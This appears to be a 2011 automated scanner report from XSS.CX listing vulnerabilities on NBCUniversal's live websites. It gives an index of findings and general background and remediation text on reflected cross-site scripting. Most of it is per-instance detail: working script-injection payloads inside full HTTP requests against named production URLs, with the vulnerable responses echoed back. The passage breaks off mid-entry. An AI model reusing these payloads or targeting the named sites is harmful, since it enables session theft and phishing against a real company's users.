XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, nbcuni.com Report generated by XSS.CX at Tue Aug 16 06:19:29 GMT-06:00 2011.
Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading
1. Cross-site scripting (reflected)
1.1. http://www.nbcuni.com/broadcast/nbc-universal-sports-olympics [name of an arbitrarily supplied request parameter]
1.2. http://www.nbcuni.com/broadcast/nbc-universal-sports-olympics [name of an arbitrarily supplied request parameter]
1.3. http://www.nbcuni.com/corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership [REST URL parameter 3]
1.4. http://www.nbcuni.com/corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership [name of an arbitrarily supplied request parameter]
1.5. http://www.nbcuni.com/corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership [name of an arbitrarily supplied request parameter]
1.6. http://www.nbcuni.com/digital/daily-candy [name of an arbitrarily supplied request parameter]
1.7. http://www.nbcuni.com/digital/daily-candy [name of an arbitrarily supplied request parameter]
1.8. http://www.nbcuni.com/parks-resorts/universal-parks-resorts [name of an arbitrarily supplied request parameter]
1.9. http://www.nbcuni.com/parks-resorts/universal-parks-resorts [name of an arbitrarily supplied request parameter]
1.10. http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni/_drawFont/drawFont.php [f parameter]
1.11. http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php [p parameter]
1.12. http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php [p parameter]
1.13. http://www.nbcuniversalstore.com/the-office-dundie-award/detail.php [p parameter]
2. Cookie scoped to parent domain
2.1. http://www.nbcuniversalstore.com/
2.2. http://www.nbcuniversalstore.com/cart.php
2.3. http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php
2.4. http://www.nbcuniversalstore.com/the-office-dundie-award/detail.php
3. Cross-domain Referer leakage
3.1. http://www.nbcuniversalstore.com/
3.2. http://www.nbcuniversalstore.com//
3.3. http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php
3.4. http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php
3.5. http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php
3.6. http://www.nbcuniversalstore.com/the-office-dundie-award/detail.php
4. Cross-domain script include
4.1. http://www.nbcuni.com/
4.2. http://www.nbcuni.com/broadcast
4.3. http://www.nbcuni.com/broadcast/nbc-universal-sports-olympics
4.4. http://www.nbcuni.com/cable
4.5. http://www.nbcuni.com/corporate
4.6. http://www.nbcuni.com/corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership
4.7. http://www.nbcuni.com/digital
4.8. http://www.nbcuni.com/digital/daily-candy
4.9. http://www.nbcuni.com/film
4.10. http://www.nbcuni.com/parks-resorts
4.11. http://www.nbcuni.com/parks-resorts/universal-parks-resorts
4.12. http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni/_css/_assets/enlarge.png
4.13. http://www.nbcuniversalstore.com/
4.14. http://www.nbcuniversalstore.com/
4.15. http://www.nbcuniversalstore.com//
4.16. http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php
4.17. http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php
4.18. http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php
4.19. http://www.nbcuniversalstore.com/the-office-dundie-award/detail.php
5. Cookie without HttpOnly flag set
5.1. http://www.nbcuniversalstore.com/
5.2. http://www.nbcuniversalstore.com/cart.php
5.3. http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php
5.4. http://www.nbcuniversalstore.com/the-office-dundie-award/detail.php
6. Email addresses disclosed
6.1. http://www.nbcuni.com/corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership
6.2. http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni/_js/jQuery.inlinePager.js
6.3. http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni/_js/jquery.paginator.js
6.4. http://www.nbcuniversalstore.com/js/omniture/s_code_dageneral.js
6.5. http://www.nbcuniversalstore.com/nbcuniversalstore/behavior/typeface-0.15.js
7. Credit card numbers disclosed
8. HTML does not specify charset
9. Content type incorrectly stated
1. Cross-site scripting (reflected)
next
There are 13 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method). The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.nbcuni.com/broadcast/nbc-universal-sports-olympics [name of an arbitrarily supplied request parameter]
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/broadcast/nbc-universal-sports-olympics
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98075"><script>alert(1)</script>8d00b817c5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98075\"><script>alert(1)</script>8d00b817c5b in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /broadcast/nbc-universal-sports-olympics?98075"><script>alert(1)</script>8d00b817c5b =1 HTTP/1.1 Host: www.nbcuni.com Proxy-Connection: keep-alive Referer: http://www.nbcuni.com/broadcast User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|271DF814851D048A-60000137600077B3[CE]; s_cc=true; s_nr=1313446731921; s_sq=nbcuglobal%2Cnbcucorporated%2Cnbcunbcuniversalbu%3D%2526pid%253DNBCUniversal%252520%25257C%252520Broadcast%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.nbcuni.com%25252Fbroadcast%25252Fnbc-universal-sports-olympics%2526ot%253DA
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Last-Modified: Mon, 15 Aug 2011 22:18:48 GMT Vary: Accept-Encoding Wirt: qw-p-wordpress02.qwplatform.com Content-Length: 20274 Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.181 80 Cache-Control: no-cache, must-revalidate Expires: Mon, 15 Aug 2011 22:18:49 GMT Date: Mon, 15 Aug 2011 22:18:49 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.nbcuni.com/broadcast/nbc-universal-sports-olympics?98075\"><script>alert(1)</script>8d00b817c5b =1&layout=button_count&show_faces=true&width=120&action=like&colorscheme=light&height=30" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:120px; height:30px;" allowTransparenc...[SNIP]...
1.2. http://www.nbcuni.com/broadcast/nbc-universal-sports-olympics [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/broadcast/nbc-universal-sports-olympics
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34b39"><script>alert(1)</script>e8484306f43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 34b39\"><script>alert(1)</script>e8484306f43 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /broadcast/nbc-universal-sports-olympics?34b39"><script>alert(1)</script>e8484306f43 =1 HTTP/1.1 Host: www.nbcuni.com Proxy-Connection: keep-alive Referer: http://www.nbcuni.com/broadcast User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|271DF814851D048A-60000137600077B3[CE]; s_cc=true; s_nr=1313446731921; s_sq=nbcuglobal%2Cnbcucorporated%2Cnbcunbcuniversalbu%3D%2526pid%253DNBCUniversal%252520%25257C%252520Broadcast%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.nbcuni.com%25252Fbroadcast%25252Fnbc-universal-sports-olympics%2526ot%253DA
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Last-Modified: Mon, 15 Aug 2011 22:18:48 GMT Vary: Accept-Encoding Wirt: qw-p-wordpress02.qwplatform.com Content-Length: 20274 Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.181 80 Cache-Control: no-cache, must-revalidate Expires: Mon, 15 Aug 2011 22:18:48 GMT Date: Mon, 15 Aug 2011 22:18:48 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... <meta property="og:url" content="http://www.nbcuni.com/broadcast/nbc-universal-sports-olympics?34b39\"><script>alert(1)</script>e8484306f43 =1"/>...[SNIP]...
1.3. http://www.nbcuni.com/corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.nbcuni.com
Path:
/corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25f88"><a>e3e056154a5 was submitted in the REST URL parameter 3. This input was echoed as 25f88\\\"><a>e3e056154a5 in the application's response. This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership25f88"><a>e3e056154a5 HTTP/1.1 Host: www.nbcuni.com Proxy-Connection: keep-alive Referer: http://search.nbcuni.com/search?q=game User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|271DF814851D048A-60000137600077B3[CE]; s_cc=true; s_nr=1313446650249; s_sq=nbcuglobal%2Cnbcucorporated%2Cnbcunbcuniversalbu%3D%2526pid%253DNBCUniversal%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.nbcuni.com%25252Fcorporate%25252Fnewsroom%25252Fmajor-league-soccer-and-nbc-sports-group-announce-multi-yea%2526ot%253DA
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Last-Modified: Mon, 15 Aug 2011 22:17:36 GMT Vary: Accept-Encoding Wirt: qw-p-wordpress02.qwplatform.com Content-Length: 13761 Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.181 80 Cache-Control: no-cache, must-revalidate Expires: Mon, 15 Aug 2011 22:17:36 GMT Date: Mon, 15 Aug 2011 22:17:36 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... <div class="col_1 corporate-major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership25f88\\\"><a>e3e056154a5 ">...[SNIP]...
1.4. http://www.nbcuni.com/corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d28ec"><script>alert(1)</script>361dcf24e5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d28ec\"><script>alert(1)</script>361dcf24e5e in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership?d28ec"><script>alert(1)</script>361dcf24e5e =1 HTTP/1.1 Host: www.nbcuni.com Proxy-Connection: keep-alive Referer: http://search.nbcuni.com/search?q=game User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|271DF814851D048A-60000137600077B3[CE]; s_cc=true; s_nr=1313446650249; s_sq=nbcuglobal%2Cnbcucorporated%2Cnbcunbcuniversalbu%3D%2526pid%253DNBCUniversal%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.nbcuni.com%25252Fcorporate%25252Fnewsroom%25252Fmajor-league-soccer-and-nbc-sports-group-announce-multi-yea%2526ot%253DA
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Last-Modified: Mon, 15 Aug 2011 22:17:29 GMT Vary: Accept-Encoding Wirt: qw-p-wordpress02.qwplatform.com Content-Length: 22365 Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.181 80 Cache-Control: no-cache, must-revalidate Expires: Mon, 15 Aug 2011 22:17:29 GMT Date: Mon, 15 Aug 2011 22:17:29 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... <meta property="og:url" content="http://www.nbcuni.com/corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership?d28ec\"><script>alert(1)</script>361dcf24e5e =1"/>...[SNIP]...
1.5. http://www.nbcuni.com/corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2d5e"><script>alert(1)</script>b8fe17e741 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a2d5e\"><script>alert(1)</script>b8fe17e741 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership?a2d5e"><script>alert(1)</script>b8fe17e741 =1 HTTP/1.1 Host: www.nbcuni.com Proxy-Connection: keep-alive Referer: http://search.nbcuni.com/search?q=game User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|271DF814851D048A-60000137600077B3[CE]; s_cc=true; s_nr=1313446650249; s_sq=nbcuglobal%2Cnbcucorporated%2Cnbcunbcuniversalbu%3D%2526pid%253DNBCUniversal%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.nbcuni.com%25252Fcorporate%25252Fnewsroom%25252Fmajor-league-soccer-and-nbc-sports-group-announce-multi-yea%2526ot%253DA
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Last-Modified: Mon, 15 Aug 2011 22:17:29 GMT Vary: Accept-Encoding Wirt: qw-p-wordpress02.qwplatform.com Content-Length: 22362 Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.181 80 Cache-Control: no-cache, must-revalidate Expires: Mon, 15 Aug 2011 22:17:30 GMT Date: Mon, 15 Aug 2011 22:17:30 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.nbcuni.com/corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership?a2d5e\"><script>alert(1)</script>b8fe17e741 =1&layout=button_count&show_faces=true&width=120&action=like&colorscheme=light&height=30" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:120px; height:30px;" allowTransparenc...[SNIP]...
1.6. http://www.nbcuni.com/digital/daily-candy [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/digital/daily-candy
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd917"><script>alert(1)</script>d4fb0dcdd3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fd917\"><script>alert(1)</script>d4fb0dcdd3c in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /digital/daily-candy?fd917"><script>alert(1)</script>d4fb0dcdd3c =1 HTTP/1.1 Host: www.nbcuni.com Proxy-Connection: keep-alive Referer: http://www.nbcuni.com/digital User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|271DF814851D048A-60000137600077B3[CE]; s_cc=true; s_nr=1313446725531; s_sq=nbcuglobal%2Cnbcucorporated%2Cnbcunbcuniversalbu%3D%2526pid%253DNBCUniversal%252520%25257C%252520Digital%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.nbcuni.com%25252Fdigital%25252Fdaily-candy%2526ot%253DA
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Last-Modified: Mon, 15 Aug 2011 22:18:41 GMT Vary: Accept-Encoding Wirt: qw-p-wordpress02.qwplatform.com Content-Length: 18946 Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.181 80 Cache-Control: no-cache, must-revalidate Expires: Mon, 15 Aug 2011 22:18:42 GMT Date: Mon, 15 Aug 2011 22:18:42 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... <meta property="og:url" content="http://www.nbcuni.com/digital/daily-candy?fd917\"><script>alert(1)</script>d4fb0dcdd3c =1"/>...[SNIP]...
1.7. http://www.nbcuni.com/digital/daily-candy [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/digital/daily-candy
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82cfc"><script>alert(1)</script>8a2a8a5aab3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82cfc\"><script>alert(1)</script>8a2a8a5aab3 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /digital/daily-candy?82cfc"><script>alert(1)</script>8a2a8a5aab3 =1 HTTP/1.1 Host: www.nbcuni.com Proxy-Connection: keep-alive Referer: http://www.nbcuni.com/digital User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|271DF814851D048A-60000137600077B3[CE]; s_cc=true; s_nr=1313446725531; s_sq=nbcuglobal%2Cnbcucorporated%2Cnbcunbcuniversalbu%3D%2526pid%253DNBCUniversal%252520%25257C%252520Digital%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.nbcuni.com%25252Fdigital%25252Fdaily-candy%2526ot%253DA
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Last-Modified: Mon, 15 Aug 2011 22:18:42 GMT Vary: Accept-Encoding Wirt: qw-p-wordpress02.qwplatform.com Content-Length: 18946 Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.181 80 Cache-Control: no-cache, must-revalidate Expires: Mon, 15 Aug 2011 22:18:42 GMT Date: Mon, 15 Aug 2011 22:18:42 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.nbcuni.com/digital/daily-candy?82cfc\"><script>alert(1)</script>8a2a8a5aab3 =1&layout=button_count&show_faces=true&width=120&action=like&colorscheme=light&height=30" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:120px; height:30px;" allowTransparenc...[SNIP]...
1.8. http://www.nbcuni.com/parks-resorts/universal-parks-resorts [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/parks-resorts/universal-parks-resorts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f95be"><script>alert(1)</script>463f9d3fff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f95be\"><script>alert(1)</script>463f9d3fff in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /parks-resorts/universal-parks-resorts?f95be"><script>alert(1)</script>463f9d3fff =1 HTTP/1.1 Host: www.nbcuni.com Proxy-Connection: keep-alive Referer: http://www.nbcuni.com/parks-resorts User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|271DF814851D048A-60000137600077B3[CE]; s_cc=true; s_nr=1313446669827; s_sq=nbcuglobal%2Cnbcucorporated%2Cnbcunbcuniversalbu%3D%2526pid%253DNBCUniversal%252520%25257C%252520Parks%252520%252526%252520Resorts%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.nbcuni.com%25252Fparks-resorts%25252Funiversal-parks-resorts%2526ot%253DA
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Last-Modified: Mon, 15 Aug 2011 22:17:47 GMT Vary: Accept-Encoding Wirt: qw-p-wordpress02.qwplatform.com Content-Length: 21283 Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.181 80 Cache-Control: no-cache, must-revalidate Expires: Mon, 15 Aug 2011 22:17:47 GMT Date: Mon, 15 Aug 2011 22:17:47 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.nbcuni.com/parks-resorts/universal-parks-resorts?f95be\"><script>alert(1)</script>463f9d3fff =1&layout=button_count&show_faces=true&width=120&action=like&colorscheme=light&height=30" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:120px; height:30px;" allowTransparenc...[SNIP]...
1.9. http://www.nbcuni.com/parks-resorts/universal-parks-resorts [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/parks-resorts/universal-parks-resorts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9943f"><script>alert(1)</script>7c9cc70dab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9943f\"><script>alert(1)</script>7c9cc70dab in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
